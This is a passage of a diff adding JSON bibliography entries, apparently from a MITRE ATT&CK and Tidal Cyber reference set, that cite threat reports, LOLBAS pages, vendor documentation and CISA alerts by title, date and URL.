"source": "MITRE", + "title": "Adding Login Items" + }, + "related": [], + "uuid": "5ab3e243-37a6-46f1-b28f-6846ecdef0ae", + "value": "Adding Login Items" + }, + { + "description": "Knowles, W. (2017, April 21). Add-In Opportunities for Office Persistence. Retrieved July 3, 2017.", + "meta": { + "date_accessed": "2017-07-03T00:00:00Z", + "date_published": "2017-04-21T00:00:00Z", + "refs": [ + "https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/" + ], + "source": "MITRE", + "title": "Add-In Opportunities for Office Persistence" + }, + "related": [], + "uuid": "a5b6ab63-0e6f-4789-a017-ceab1719ed85", + "value": "MRWLabs Office Persistence Add-ins" + }, + { + "description": "LOLBAS. (2023, October 5). AddinUtil.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2023-10-05T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Addinutil/" + ], + "source": "Tidal Cyber", + "title": "AddinUtil.exe" + }, + "related": [], + "uuid": "91af546d-0a56-4c17-b292-6257943a8aba", + "value": "AddinUtil.exe - LOLBAS Project" + }, + { + "description": "Microsoft. (n.d.). Add-Mailbox Permission. Retrieved September 13, 2019.", + "meta": { + "date_accessed": "2019-09-13T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/exchange/mailboxes/add-mailboxpermission?view=exchange-ps" + ], + "source": "MITRE", + "title": "Add-Mailbox Permission" + }, + "related": [], + "uuid": "b8d40efb-c78d-47dd-9d83-e5a31af73691", + "value": "Microsoft - Add-MailboxPermission" + }, + { + "description": "Microsoft. (n.d.). AddMonitor function. Retrieved November 12, 2014.", + "meta": { + "date_accessed": "2014-11-12T00:00:00Z", + "refs": [ + "http://msdn.microsoft.com/en-us/library/dd183341" + ], + "source": "MITRE", + "title": "AddMonitor function" + }, + "related": [], + "uuid": "8c1a719e-6ca1-4b41-966d-ddb87c849fe0", + "value": "AddMonitor" + }, + { + "description": "Microsoft. (2019, November 11). Add or delete users using Azure Active Directory. Retrieved January 30, 2020.", + "meta": { + "date_accessed": "2020-01-30T00:00:00Z", + "date_published": "2019-11-11T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/add-users-azure-active-directory" + ], + "source": "MITRE", + "title": "Add or delete users using Azure Active Directory" + }, + "related": [], + "uuid": "b69468a2-693e-4bd0-8dc1-ccfd7d5630c0", + "value": "Microsoft Azure AD Users" + }, + { + "description": "Microsoft. (n.d.). Add or remove add-ins. Retrieved July 3, 2017.", + "meta": { + "date_accessed": "2017-07-03T00:00:00Z", + "refs": [ + "https://support.office.com/article/Add-or-remove-add-ins-0af570c4-5cf3-4fa9-9b88-403625a0b460" + ], + "source": "MITRE", + "title": "Add or remove add-ins" + }, + "related": [], + "uuid": "99b20e30-76a8-4108-84ae-daf92058b44b", + "value": "Microsoft Office Add-ins" + }, + { + "description": "Microsoft. (2018, May 31). AddPrintProcessor function. Retrieved October 5, 2020.", + "meta": { + "date_accessed": "2020-10-05T00:00:00Z", + "date_published": "2018-05-31T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/windows/win32/printdocs/addprintprocessor" + ], + "source": "MITRE", + "title": "AddPrintProcessor function" + }, + "related": [], + "uuid": "12c7160b-c93c-44cd-b108-68d4823aec8c", + "value": "Microsoft AddPrintProcessor May 2018" + }, + { + "description": "IETF Network Working Group. (1996, February). Address Allocation for Private Internets. Retrieved October 20, 2020.", + "meta": { + "date_accessed": "2020-10-20T00:00:00Z", + "date_published": "1996-02-01T00:00:00Z", + "refs": [ + "https://tools.ietf.org/html/rfc1918" + ], + "source": "MITRE", + "title": "Address Allocation for Private Internets" + }, + "related": [], + "uuid": "f2cdf62e-cb9b-4a48-99a2-d46e7d9e7a9e", + "value": "RFC1918" + }, + { + "description": "Microsoft. (2020, February 7). Address lists in Exchange Server. Retrieved March 26, 2020.", + "meta": { + "date_accessed": "2020-03-26T00:00:00Z", + "date_published": "2020-02-07T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/exchange/email-addresses-and-address-books/address-lists/address-lists?view=exchserver-2019" + ], + "source": "MITRE", + "title": "Address lists in Exchange Server" + }, + "related": [], + "uuid": "138ec24a-4361-4ce0-b78e-508c11db397c", + "value": "Microsoft Exchange Address Lists" + }, + { + "description": "Foulds, I. et al. (2018, August 7). AD DS Getting Started. Retrieved September 23, 2021.", + "meta": { + "date_accessed": "2021-09-23T00:00:00Z", + "date_published": "2018-08-07T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/ad-ds-getting-started" + ], + "source": "MITRE", + "title": "AD DS Getting Started" + }, + "related": [], + "uuid": "82d01c77-571b-4f33-a286-878f325462ae", + "value": "Microsoft AD DS Getting Started" + }, + { + "description": "Liu, H. and Yuzifovich, Y. (2018, January 9). A Death Match of Domain Generation Algorithms. Retrieved February 18, 2019.", + "meta": { + "date_accessed": "2019-02-18T00:00:00Z", + "date_published": "2018-01-09T00:00:00Z", + "refs": [ + "https://blogs.akamai.com/2018/01/a-death-match-of-domain-generation-algorithms.html" + ], + "source": "MITRE", + "title": "A Death Match of Domain Generation Algorithms" + }, + "related": [], + "uuid": "5b14cdf6-261a-4d7e-acb4-74e7fafa9467", + "value": "Akamai DGA Mitigation" + }, + { + "description": "Yana Gourenko. (n.d.). A Deep Dive into Apple Keychain Decryption. Retrieved April 13, 2022.", + "meta": { + "date_accessed": "2022-04-13T00:00:00Z", + "refs": [ + "https://support.passware.com/hc/en-us/articles/4573379868567-A-Deep-Dive-into-Apple-Keychain-Decryption" + ], + "source": "MITRE", + "title": "A Deep Dive into Apple Keychain Decryption" + }, + "related": [], + "uuid": "6a426ab4-5b0b-46d4-9dfe-e2587f69e111", + "value": "Keychain Decryption Passware" + }, + { + "description": "Marco Balduzzi, Ryan Flores, Lion Gu, Federico Maggi, Vincenzo Ciancaglini, Roel Reyes, Akira Urano. (n.d.). A Deep Dive into Defacement: How Geopolitical Events Trigger Web Attacks. Retrieved April 19, 2019.", + "meta": { + "date_accessed": "2019-04-19T00:00:00Z", + "refs": [ + "https://documents.trendmicro.com/assets/white_papers/wp-a-deep-dive-into-defacement.pdf" + ], + "source": "MITRE", + "title": "A Deep Dive into Defacement: How Geopolitical Events Trigger Web Attacks" + }, + "related": [], + "uuid": "4886418b-3a2e-4f12-b91e-3bb2a8134112", + "value": "Trend Micro Deep Dive Into Defacement" + }, + { + "description": "Muhammad, I., Unterbrink, H.. (2021, January 6). A Deep Dive into Lokibot Infection Chain. Retrieved August 31, 2021.", + "meta": { + "date_accessed": "2021-08-31T00:00:00Z", + "date_published": "2021-01-06T00:00:00Z", + "refs": [ + "https://blog.talosintelligence.com/2021/01/a-deep-dive-into-lokibot-infection-chain.html" + ], + "source": "MITRE", + "title": "A Deep Dive into Lokibot Infection Chain" + }, + "related": [], + "uuid": "3baba4e6-0cf5-45eb-8abb-6c389743af89", + "value": "Talos Lokibot Jan 2021" + }, + { + "description": "Hasherezade. (2021, April 6). A deep dive into Saint Bot, a new downloader. Retrieved June 9, 2022.", + "meta": { + "date_accessed": "2022-06-09T00:00:00Z", + "date_published": "2021-04-06T00:00:00Z", + "refs": [ + "https://blog.malwarebytes.com/threat-intelligence/2021/04/a-deep-dive-into-saint-bot-downloader/" + ], + "source": "MITRE", + "title": "A deep dive into Saint Bot, a new downloader" + }, + "related": [], + "uuid": "3a1faa47-7bd3-453f-9b7a-bb17efb8bb3c", + "value": "Malwarebytes Saint Bot April 2021" + }, + { + "description": "Vlad Pasca. (2022, September 27). A Deep Dive Into the APT28’s stealer called CredoMap. Retrieved December 5, 2023.", + "meta": { + "date_accessed": "2023-12-05T00:00:00Z", + "date_published": "2022-09-27T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://securityscorecard.com/research/apt28s-stealer-called-credomap/" + ], + "source": "Tidal Cyber", + "title": "A Deep Dive Into the APT28’s stealer called CredoMap" + }, + "related": [], + "uuid": "3e683efc-4712-4397-8d55-4354ff7ad9f0", + "value": "SecurityScorecard CredoMap September 2022" + }, + { + "description": "Brian Krebs. (2019, February 18). A Deep Dive on the Recent Widespread DNS Hijacking Attacks. Retrieved February 14, 2022.", + "meta": { + "date_accessed": "2022-02-14T00:00:00Z", + "date_published": "2019-02-18T00:00:00Z", + "refs": [ + "https://krebsonsecurity.com/2019/02/a-deep-dive-on-the-recent-widespread-dns-hijacking-attacks/" + ], + "source": "MITRE", + "title": "A Deep Dive on the Recent Widespread DNS Hijacking Attacks" + }, + "related": [], + "uuid": "9bdc618d-ff55-4ac8-8967-6039c6c24cb1", + "value": "Krebs DNS Hijack 2019" + }, + { + "description": "Reaqta. (2017, November 22). A dive into MuddyWater APT targeting Middle-East. Retrieved May 18, 2020.", + "meta": { + "date_accessed": "2020-05-18T00:00:00Z", + "date_published": "2017-11-22T00:00:00Z", + "refs": [ + "https://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/" + ], + "source": "MITRE", + "title": "A dive into MuddyWater APT targeting Middle-East" + }, + "related": [], + "uuid": "ecd28ccf-edb6-478d-a8f1-da630df42127", + "value": "Reaqta MuddyWater November 2017" + }, + { + "description": "Faou, M. and Dumont R.. (2019, May 29). A dive into Turla PowerShell usage. Retrieved June 14, 2019.", + "meta": { + "date_accessed": "2019-06-14T00:00:00Z", + "date_published": "2019-05-29T00:00:00Z", + "refs": [ + "https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/" + ], + "source": "MITRE", + "title": "A dive into Turla PowerShell usage" + }, + "related": [], + "uuid": "68c0f34b-691a-4847-8d49-f18b7f4e5188", + "value": "ESET Turla PowerShell May 2019" + }, + { + "description": "Kubernetes. (n.d.). Admission Controllers Reference. Retrieved March 8, 2023.", + "meta": { + "date_accessed": "2023-03-08T00:00:00Z", + "refs": [ + "https://kubernetes.io/docs/reference/access-authn-authz/admission-controllers" + ], + "source": "MITRE", + "title": "Admission Controllers Reference" + }, + "related": [], + "uuid": "ea035e41-159b-5f12-96fc-0638eace9fd2", + "value": "Kubernetes Admission Controllers" + }, + { + "description": "Brian Krebs. (2013, October 3). Adobe To Announce Source Code, Customer Data Breach. Retrieved May 17, 2021.", + "meta": { + "date_accessed": "2021-05-17T00:00:00Z", + "date_published": "2013-10-03T00:00:00Z", + "refs": [ + "https://krebsonsecurity.com/2013/10/adobe-to-announce-source-code-customer-data-breach/" + ], + "source": "MITRE", + "title": "Adobe To Announce Source Code, Customer Data Breach" + }, + "related": [], + "uuid": "bc2b0b89-e00d-4beb-bf27-fe81d8c826a4", + "value": "Krebs Adobe" + }, + { + "description": "Twi1ight. (2015, July 11). AD-Pentest-Script - wmiexec.vbs. Retrieved June 29, 2017.", + "meta": { + "date_accessed": "2017-06-29T00:00:00Z", + "date_published": "2015-07-11T00:00:00Z", + "refs": [ + "https://github.com/Twi1ight/AD-Pentest-Script/blob/master/wmiexec.vbs" + ], + "source": "MITRE", + "title": "AD-Pentest-Script - wmiexec.vbs" + }, + "related": [], + "uuid": "45a5f6c2-b52e-4518-a10e-19797e6fdcc3", + "value": "Github AD-Pentest-Script" + }, + { + "description": "LOLBAS. (2021, September 1). adplus.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2021-09-01T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Adplus/" + ], + "source": "Tidal Cyber", + "title": "adplus.exe" + }, + "related": [], + "uuid": "d407ca0a-7ace-4dc5-947d-69a1e5a1d459", + "value": "adplus.exe - LOLBAS Project" + }, + { + "description": "Microsoft. (2017, December 12). ADV170021 - Microsoft Office Defense in Depth Update. Retrieved February 3, 2018.", + "meta": { + "date_accessed": "2018-02-03T00:00:00Z", + "date_published": "2017-12-12T00:00:00Z", + "refs": [ + "https://portal.msrc.microsoft.com/security-guidance/advisory/ADV170021" + ], + "source": "MITRE", + "title": "ADV170021 - Microsoft Office Defense in Depth Update" + }, + "related": [], + "uuid": "ce960e76-848f-440d-9843-54773f7b11cf", + "value": "Microsoft ADV170021 Dec 2017" + }, + { + "description": "FireEye. (n.d.). Advanced Persistent Threat Groups. Retrieved August 3, 2018.", + "meta": { + "date_accessed": "2018-08-03T00:00:00Z", + "refs": [ + "https://www.fireeye.com/current-threats/apt-groups.html#apt19" + ], + "source": "MITRE, Tidal Cyber", + "title": "Advanced Persistent Threat Groups" + }, + "related": [], + "uuid": "5b6b909d-870a-4d14-85ec-6aa14e598740", + "value": "FireEye APT Groups" + }, + { + "description": "Mandiant. (n.d.). Advanced Persistent Threats (APTs). Retrieved September 14, 2023.", + "meta": { + "date_accessed": "2023-09-14T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.mandiant.com/resources/insights/apt-groups" + ], + "source": "Tidal Cyber", + "title": "Advanced Persistent Threats (APTs)" + }, + "related": [], + "uuid": "c984fcfc-1bfd-4b1e-9034-a6ff3e6ebf97", + "value": "Mandiant APT Groups List" + }, + { + "description": "Simpson, D. et al. (2017, April 19). Advanced security audit policy settings. Retrieved September 14, 2021.", + "meta": { + "date_accessed": "2021-09-14T00:00:00Z", + "date_published": "2017-04-19T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/advanced-security-audit-policy-settings" + ], + "source": "MITRE", + "title": "Advanced security audit policy settings" + }, + "related": [], + "uuid": "9aef57b1-1a2e-4833-815e-887616cc0570", + "value": "Advanced_sec_audit_policy_settings" + }, + { + "description": "CrowdStrike. (2021, September 30). Adversary Profile - Ricochet Chollima. Retrieved September 30, 2021.", + "meta": { + "date_accessed": "2021-09-30T00:00:00Z", + "date_published": "2021-09-30T00:00:00Z", + "refs": [ + "https://www.crowdstrike.com/adversaries/ricochet-chollima/" + ], + "source": "MITRE", + "title": "Adversary Profile - Ricochet Chollima" + }, + "related": [], + "uuid": "69a23467-c55c-43a3-951d-c208e6ead6f7", + "value": "CrowdStrike Richochet Chollima September 2021" + }, + { + "description": "French, D., Murphy, B. (2020, March 24). Adversary tradecraft 101: Hunting for persistence using Elastic Security (Part 1). Retrieved December 21, 2020.", + "meta": { + "date_accessed": "2020-12-21T00:00:00Z", + "date_published": "2020-03-24T00:00:00Z", + "refs": [ + "https://www.elastic.co/blog/hunting-for-persistence-using-elastic-security-part-1" + ], + "source": "MITRE", + "title": "Adversary tradecraft 101: Hunting for persistence using Elastic Security (Part 1)" + }, + "related": [], + "uuid": "bd9406d3-c3e3-4737-97a1-a4bc997c88cd", + "value": "Elastic - Hunting for Persistence Part 1" + }, + { + "description": "National Cyber Security Centre. (2020, July 16). Advisory: APT29 targets COVID-19 vaccine development. Retrieved September 29, 2020.", + "meta": { + "date_accessed": "2020-09-29T00:00:00Z", + "date_published": "2020-07-16T00:00:00Z", + "refs": [ + "https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development-V1-1.pdf" + ], + "source": "MITRE", + "title": "Advisory: APT29 targets COVID-19 vaccine development" + }, + "related": [], + "uuid": "28da86a6-4ca1-4bb4-a401-d4aa469c0034", + "value": "NCSC APT29 July 2020" + }, + { + "description": "LOLBAS. (2018, May 25). Advpack.dll. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2018-05-25T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Libraries/Advpack/" + ], + "source": "Tidal Cyber", + "title": "Advpack.dll" + }, + "related": [], + "uuid": "837ccb3c-316d-4d96-8a33-b5df40870aba", + "value": "Advpack.dll - LOLBAS Project" + }, + { + "description": "Kamluk, V. & Gostev, A. (2016, February). Adwind - A Cross-Platform RAT. Retrieved April 23, 2019.", + "meta": { + "date_accessed": "2019-04-23T00:00:00Z", + "date_published": "2016-02-01T00:00:00Z", + "refs": [ + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07195002/KL_AdwindPublicReport_2016.pdf" + ], + "source": "MITRE", + "title": "Adwind - A Cross-Platform RAT" + }, + "related": [], + "uuid": "69fd8de4-81bc-4165-b77d-c5fc72cfa699", + "value": "Kaspersky Adwind Feb 2016" + }, + { + "description": "Radu Tudorica. (2021, July 12). A Fresh Look at Trickbot’s Ever-Improving VNC Module. Retrieved September 28, 2021.", + "meta": { + "date_accessed": "2021-09-28T00:00:00Z", + "date_published": "2021-07-12T00:00:00Z", + "refs": [ + "https://www.bitdefender.com/files/News/CaseStudies/study/399/Bitdefender-PR-Whitepaper-Trickbot-creat5515-en-EN.pdf" + ], + "source": "MITRE", + "title": "A Fresh Look at Trickbot’s Ever-Improving VNC Module" + }, + "related": [], + "uuid": "ee2709d7-2b33-48ac-8e90-a2770d469d80", + "value": "Bitdefender Trickbot VNC module Whitepaper 2021" + }, + { + "description": "Dan Goodin. (2016, July 6). After hiatus, in-the-wild Mac backdoors are suddenly back. Retrieved July 8, 2017.", + "meta": { + "date_accessed": "2017-07-08T00:00:00Z", + "date_published": "2016-07-06T00:00:00Z", + "refs": [ + "https://arstechnica.com/security/2016/07/after-hiatus-in-the-wild-mac-backdoors-are-suddenly-back/" + ], + "source": "MITRE", + "title": "After hiatus, in-the-wild Mac backdoors are suddenly back" + }, + "related": [], + "uuid": "c37f00dc-ee53-4be1-9046-0a28bdc5649a", + "value": "Mac Backdoors are back" + }, + { + "description": "Plakhov, A., Sitchikhin, D. (2019, August 22). Agent 1433: remote attack on Microsoft SQL Server. Retrieved September 4, 2019.", + "meta": { + "date_accessed": "2019-09-04T00:00:00Z", + "date_published": "2019-08-22T00:00:00Z", + "refs": [ + "https://securelist.com/malicious-tasks-in-ms-sql-server/92167/" + ], + "source": "MITRE", + "title": "Agent 1433: remote attack on Microsoft SQL Server" + }, + "related": [], + "uuid": "569a6be3-7a10-4aa4-be26-a62ed562a4ce", + "value": "Kaspersky MSSQL Aug 2019" + }, + { + "description": "Gostev, A.. (2014, March 12). Agent.btz: a Source of Inspiration?. Retrieved April 8, 2016.", + "meta": { + "date_accessed": "2016-04-08T00:00:00Z", + "date_published": "2014-03-12T00:00:00Z", + "refs": [ + "https://securelist.com/agent-btz-a-source-of-inspiration/58551/" + ], + "source": "MITRE", + "title": "Agent.btz: a Source of Inspiration?" + }, + "related": [], + "uuid": "3b876c56-1d18-49e3-9a96-5cee4af7ab72", + "value": "Securelist Agent.btz" + }, + { + "description": "Shevchenko, S.. (2008, November 30). Agent.btz - A Threat That Hit Pentagon. Retrieved April 8, 2016.", + "meta": { + "date_accessed": "2016-04-08T00:00:00Z", + "date_published": "2008-11-30T00:00:00Z", + "refs": [ + "http://blog.threatexpert.com/2008/11/agentbtz-threat-that-hit-pentagon.html" + ], + "source": "MITRE", + "title": "Agent.btz - A Threat That Hit Pentagon" + }, + "related": [], + "uuid": "b710c404-b02e-444c-9388-9a5e751971d2", + "value": "ThreatExpert Agent.btz" + }, + { + "description": "LOLBAS. (2020, July 23). AgentExecutor.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2020-07-23T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Agentexecutor/" + ], + "source": "Tidal Cyber", + "title": "AgentExecutor.exe" + }, + "related": [], + "uuid": "633d7f25-df9d-4619-9aa9-92d1d9d225d7", + "value": "AgentExecutor.exe - LOLBAS Project" + }, + { + "description": "Walter, J. (2020, August 10). Agent Tesla | Old RAT Uses New Tricks to Stay on Top. Retrieved December 11, 2020.", + "meta": { + "date_accessed": "2020-12-11T00:00:00Z", + "date_published": "2020-08-10T00:00:00Z", + "refs": [ + "https://labs.sentinelone.com/agent-tesla-old-rat-uses-new-tricks-to-stay-on-top/" + ], + "source": "MITRE", + "title": "Agent Tesla | Old RAT Uses New Tricks to Stay on Top" + }, + "related": [], + "uuid": "5f712e3f-5a9d-4af3-b846-a61dc1d59b3a", + "value": "SentinelLabs Agent Tesla Aug 2020" + }, + { + "description": "Hegel, T. (2021, January 13). A Global Perspective of the SideWinder APT. Retrieved January 27, 2021.", + "meta": { + "date_accessed": "2021-01-27T00:00:00Z", + "date_published": "2021-01-13T00:00:00Z", + "refs": [ + "https://cdn-cybersecurity.att.com/docs/global-perspective-of-the-sidewinder-apt.pdf" + ], + "source": "MITRE, Tidal Cyber", + "title": "A Global Perspective of the SideWinder APT" + }, + "related": [], + "uuid": "d6644f88-d727-4f62-897a-bfa18f86380d", + "value": "ATT Sidewinder January 2021" + }, + { + "description": "Schroeder, W. (2017, October 30). A Guide to Attacking Domain Trusts. Retrieved February 14, 2019.", + "meta": { + "date_accessed": "2019-02-14T00:00:00Z", + "date_published": "2017-10-30T00:00:00Z", + "refs": [ + "https://posts.specterops.io/a-guide-to-attacking-domain-trusts-971e52cb2944" + ], + "source": "MITRE", + "title": "A Guide to Attacking Domain Trusts" + }, + "related": [], + "uuid": "23a9ef6c-9f71-47bb-929f-9a92f24553eb", + "value": "Harmj0y Domain Trusts" + }, + { + "description": "airwalk. (2023, January 1). A guide to backdooring Unix systems. Retrieved May 31, 2023.", + "meta": { + "date_accessed": "2023-05-31T00:00:00Z", + "date_published": "2023-01-01T00:00:00Z", + "refs": [ + "http://www.ouah.org/backdoors.html" + ], + "source": "MITRE", + "title": "A guide to backdooring Unix systems" + }, + "related": [], + "uuid": "3f3bca4a-68fa-5d4a-b86f-36f82345ff36", + "value": "airwalk backdoor unix systems" + }, + { + "description": "Greenberg, A. (2019, March 25). A Guide to LockerGoga, the Ransomware Crippling Industrial Firms. Retrieved July 17, 2019.", + "meta": { + "date_accessed": "2019-07-17T00:00:00Z", + "date_published": "2019-03-25T00:00:00Z", + "refs": [ + "https://www.wired.com/story/lockergoga-ransomware-crippling-industrial-firms/" + ], + "source": "MITRE", + "title": "A Guide to LockerGoga, the Ransomware Crippling Industrial Firms" + }, + "related": [], + "uuid": "de12f263-f76d-4b63-beb8-b210f7a8310d", + "value": "Wired Lockergoga 2019" + }, + { + "description": "Cimpanu, C. (2020, May 9). A hacker group is selling more than 73 million user records on the dark web. Retrieved October 20, 2020.", + "meta": { + "date_accessed": "2020-10-20T00:00:00Z", + "date_published": "2020-05-09T00:00:00Z", + "refs": [ + "https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/" + ], + "source": "MITRE", + "title": "A hacker group is selling more than 73 million user records on the dark web" + }, + "related": [], + "uuid": "61d00ae2-5494-4c6c-8860-6826e701ade8", + "value": "ZDNET Selling Data" + }, + { + "description": "ESET Research. (2019, May 22). A journey to Zebrocy land. Retrieved June 20, 2019.", + "meta": { + "date_accessed": "2019-06-20T00:00:00Z", + "date_published": "2019-05-22T00:00:00Z", + "refs": [ + "https://www.welivesecurity.com/2019/05/22/journey-zebrocy-land/" + ], + "source": "MITRE", + "title": "A journey to Zebrocy land" + }, + "related": [], + "uuid": "f8b837fb-e46c-4153-8e86-dc4b909b393a", + "value": "ESET Zebrocy May 2019" + }, + { + "description": "Microsoft. (2023, February 27). AKS-managed Azure Active Directory integration. Retrieved March 8, 2023.", + "meta": { + "date_accessed": "2023-03-08T00:00:00Z", + "date_published": "2023-02-27T00:00:00Z", + "refs": [ + "https://learn.microsoft.com/en-us/azure/aks/managed-aad" + ], + "source": "MITRE", + "title": "AKS-managed Azure Active Directory integration" + }, + "related": [], + "uuid": "809db259-3557-5597-9d1a-7c00cc10b89c", + "value": "Microsoft AKS Azure AD 2023" + }, + { + "description": "US-CERT. (2018, December 3). Alert (AA18-337A): SamSam Ransomware. Retrieved March 15, 2019.", + "meta": { + "date_accessed": "2019-03-15T00:00:00Z", + "date_published": "2018-12-03T00:00:00Z", + "refs": [ + "https://www.us-cert.gov/ncas/alerts/AA18-337A" + ], + "source": "MITRE", + "title": "Alert (AA18-337A): SamSam Ransomware" + }, + "related": [], + "uuid": "b9d14fea-2330-4eed-892c-b4e05a35d273", + "value": "US-CERT SamSam 2018" + }, + { + "description": "CISA. (2020, September 14). Alert (AA20-258A): Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity. Retrieved October 1, 2020.", + "meta": { + "date_accessed": "2020-10-01T00:00:00Z", + "date_published": "2020-09-14T00:00:00Z", + "refs": [ + "https://us-cert.cisa.gov/ncas/alerts/aa20-258a" + ], + "source": "MITRE", + "title": "Alert (AA20-258A): Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity" + }, + "related": [], + "uuid": "ffe613e3-b528-42bf-81d5-4d8de38b3457", + "value": "CISA MSS Sep 2020" + }, + { + "description": "DHS/CISA. (2020, September 22). Alert (AA20-266A) LokiBot Malware . Retrieved September 15, 2021.", + "meta": { + "date_accessed": "2021-09-15T00:00:00Z", + "date_published": "2020-09-22T00:00:00Z", + "refs": [ + "https://us-cert.cisa.gov/ncas/alerts/aa20-266a" + ], + "source": "MITRE", + "title": "Alert (AA20-266A) LokiBot Malware" + }, + "related": [], + "uuid": "df979f7b-6de8-4029-ae47-700f29157db0", + "value": "CISA Lokibot September 2020" + }, + { + "description": "CISA. (2021, August 20). Alert (AA21-200B) Chinese State-Sponsored Cyber Operations: Observed TTPs. Retrieved June 21, 2022.", + "meta": { + "date_accessed": "2022-06-21T00:00:00Z", + "date_published": "2021-08-20T00:00:00Z", + "refs": [ + "https://www.cisa.gov/uscert/ncas/alerts/aa21-200b" + ], + "source": "MITRE", + "title": "Alert (AA21-200B) Chinese State-Sponsored Cyber Operations: Observed TTPs" + }, + "related": [], + "uuid": "633c6045-8990-58ae-85f0-00139aa9a091", + "value": "CISA_AA21_200B" + }, + { + "description": "CISA. (2022, April 28). Alert (AA22-057A) Update: Destructive Malware Targeting Organizations in Ukraine. Retrieved July 29, 2022.", + "meta": { + "date_accessed": "2022-07-29T00:00:00Z", + "date_published": "2022-04-28T00:00:00Z", + "refs": [ + "https://www.cisa.gov/uscert/ncas/alerts/aa22-057a" + ], + "source": "MITRE", + "title": "Alert (AA22-057A) Update: Destructive Malware Targeting Organizations in Ukraine" + }, + "related": [], + "uuid": "ebe89b36-f87f-4e09-8030-a1328c0b8683", + "value": "cisa_malware_orgs_ukraine" + }, + { + "description": "US-CERT. (2016, March 31). Alert (TA16-091A): Ransomware and Recent Variants. Retrieved March 15, 2019.", + "meta": { + "date_accessed": "2019-03-15T00:00:00Z", + "date_published": "2016-03-31T00:00:00Z", + "refs": [ + "https://www.us-cert.gov/ncas/alerts/TA16-091A" + ], + "source": "MITRE", + "title": "Alert (TA16-091A): Ransomware and Recent Variants" + }, + "related": [], + "uuid": "866484fa-836d-4c5b-bbad-3594ef60599c", + "value": "US-CERT Ransomware 2016" + }, + { + "description": "US-CERT. (2017, May 12). Alert (TA17-132A): Indicators Associated With WannaCry Ransomware. Retrieved March 25, 2019.", + "meta": { + "date_accessed": "2019-03-25T00:00:00Z", + "date_published": "2017-05-12T00:00:00Z", + "refs": [ + "https://www.us-cert.gov/ncas/alerts/TA17-132A" + ], + "source": "MITRE", + "title": "Alert (TA17-132A): Indicators Associated With WannaCry Ransomware" + }, + "related": [], + "uuid": "349b8e9d-7172-4d01-b150-f0371d038b7e", + "value": "US-CERT WannaCry 2017" + }, + { + "description": "US-CERT. (2017, June 13). Alert (TA17-164A) HIDDEN COBRA – North Korea’s DDoS Botnet Infrastructure. Retrieved July 13, 2017.", + "meta": { + "date_accessed": "2017-07-13T00:00:00Z", + "date_published": "2017-06-13T00:00:00Z", + "refs": [ + "https://www.us-cert.gov/ncas/alerts/TA17-164A" + ], + "source": "MITRE", + "title": "Alert (TA17-164A) HIDDEN COBRA – North Korea’s DDoS Botnet Infrastructure" + }, + "related": [], + "uuid": "8e57cea3-ee37-4507-bb56-7445050ec8ca", + "value": "US-CERT HIDDEN COBRA June 2017" + }, + { + "description": "US-CERT. (2017, July 1). Alert (TA17-181A): Petya Ransomware. Retrieved March 15, 2019.", + "meta": { + "date_accessed": "2019-03-15T00:00:00Z", + "date_published": "2017-07-01T00:00:00Z", + "refs": [ + "https://www.us-cert.gov/ncas/alerts/TA17-181A" + ], + "source": "MITRE", + "title": "Alert (TA17-181A): Petya Ransomware" + }, + "related": [], + "uuid": "6a009850-834b-4178-9028-2745921b6743", + "value": "US-CERT NotPetya 2017" + }, + { + "description": "US-CERT. (2017, October 20). Alert (TA17-293A): Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors. Retrieved November 2, 2017.", + "meta": { + "date_accessed": "2017-11-02T00:00:00Z", + "date_published": "2017-10-20T00:00:00Z", + "refs": [ + "https://www.us-cert.gov/ncas/alerts/TA17-293A" + ], + "source": "MITRE", + "title": "Alert (TA17-293A): Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors" + }, + "related": [], + "uuid": "e34ddf0a-a112-4557-ac09-1ff540241a89", + "value": "US-CERT APT Energy Oct 2017" + }, + { + "description": "US-CERT. (2017, November 22). Alert (TA17-318A): HIDDEN COBRA – North Korean Remote Administration Tool: FALLCHILL. Retrieved December 7, 2017.", + "meta": { + "date_accessed": "2017-12-07T00:00:00Z", + "date_published": "2017-11-22T00:00:00Z", + "refs": [ + "https://www.us-cert.gov/ncas/alerts/TA17-318A" + ], + "source": "MITRE", + "title": "Alert (TA17-318A): HIDDEN COBRA – North Korean Remote Administration Tool: FALLCHILL" + }, + "related": [], + "uuid": "045e03f9-af83-4442-b69e-b80f68e570ac", + "value": "US-CERT FALLCHILL Nov 2017" + }, + { + "description": "US-CERT. (2017, November 22). Alert (TA17-318B): HIDDEN COBRA – North Korean Trojan: Volgmer. Retrieved December 7, 2017.", + "meta": { + "date_accessed": 